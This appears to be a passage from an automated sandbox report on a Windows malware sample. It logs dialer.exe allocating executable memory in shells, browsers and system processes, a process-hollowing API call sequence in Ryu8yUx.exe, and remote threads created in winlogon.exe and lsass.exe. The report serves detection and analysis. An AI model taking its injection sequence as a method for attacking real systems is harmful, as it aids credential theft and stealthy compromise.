Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E7E2BB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 25433C40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2162BBF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 1FDF37C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 205F6620000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 23B8EA40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 23BA8D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 14A04DF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 19E619D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2E66F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 2CD170E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 154E0B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 2CD17880000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 154E2A20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 225129D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F09B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 22512E20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F23EA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1995E010000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 21939E00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 2213C5B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 231896B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 231A3A20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 16028450000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1C7E7310000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 278821D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 23501570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2499BE30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 23D04520000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2499BE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 258C6320000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\NNPCZ\mmytljldrgl.exe base: 950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\NNPCZ\mmytljldrgl.exe base: 9A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 1C090EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 1C090EE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 21E693E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 36E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 1B091DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 19FE4C90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 22473C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 19FE50F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 29D8BC80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 22473F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D7C6010000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1C164D20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2723BB20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1C165070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2723DD40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1A866E60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A327130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1A8671C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A3292B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1CCC8BF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A2DB600000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1CCC9390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A2DBA20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 288B6C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 1B2A5A80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 263F7530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 1BAA8230000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 263F90A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2528A950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 28AB3320000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 292B5970000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1AF49860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1AF4BAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 16DC7320000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 29CA7AC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1F5ABDC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 236C5280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 23EC8230000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 17084C70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 17086CD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1EDCA140000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 29B48F20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 23518C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2E250AF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2E250B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 158C9290000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 158C9600000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21A39A50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21A39DC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 171F7E00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C191250000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 19CF9BE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 19CF9CE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1824D380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 141FCAF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E541120000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 141FCE50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27D3DE20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 16F55510000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E541480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27D3FE90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1BFA97D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C371320000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1BFA9F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3732F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 2370FF10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22851D50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 23710260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2286C070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1F36EA00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2DE7C5D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 19E573B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 2094F9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 1A6596B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 20950080000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 234E1AA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 234E3690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 2D04A490000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1E29E6C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 2D04AB10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 250DED30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 250DED60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2534DF00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D2C7140000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1FAD08C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 179A7FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\mshta.exe base: 181AA770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25B6CC00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25B6E8F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1F21B270000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F23FF50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FDE0180000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 17A9BA50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2A929670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 17AA8DD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2A934D20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B2A3B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1B16FE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B2C2E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1B171D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC7A90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC7AC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WerFault.exe base: 11318760000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8200000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC82C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8320000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1F890960000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 238DA2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 250EC700000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 250EC7A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21CDF150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21CF0A40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2336B7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2337A1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 254A7210000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 254A7240000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\1074046001\62aa2588e0.exe base: 1D5EDE00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 203AE2E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 203AFE20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 26B195A0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Code function: 12_2_02B790E1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

12_2_02B790E1

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 8FA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: B5E6273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: DF36273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: DEAB273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: CB0E273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 419A273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 389C273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E94273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2321273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe EIP: 7246273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7D55273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CF3B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BD5B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 301A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B846273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 80BA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 32C7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8FCA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E614273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1410273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 951A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 807B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DAD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9C5D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DF1B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1A00273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B3B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BEE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 23F4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C045273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9B4F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1418273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60CA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 47BA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 874A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DE8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 522E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 835B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 472B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DA71273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C211273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7AF0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C7BA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 97EE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 945A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 12B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 899C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 77E8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1FC0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2094273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7A93273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CBE8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DB70273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 81D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DDF6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 61FD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A850273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C401273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 85273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BFF9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40A8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 47DE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1902273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 52AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1BC2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1FC5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7F79273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FE70273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EDC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 98D0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 70FD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2DD9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B221273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 589B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F68273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 215273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 15A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 59EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D070273C
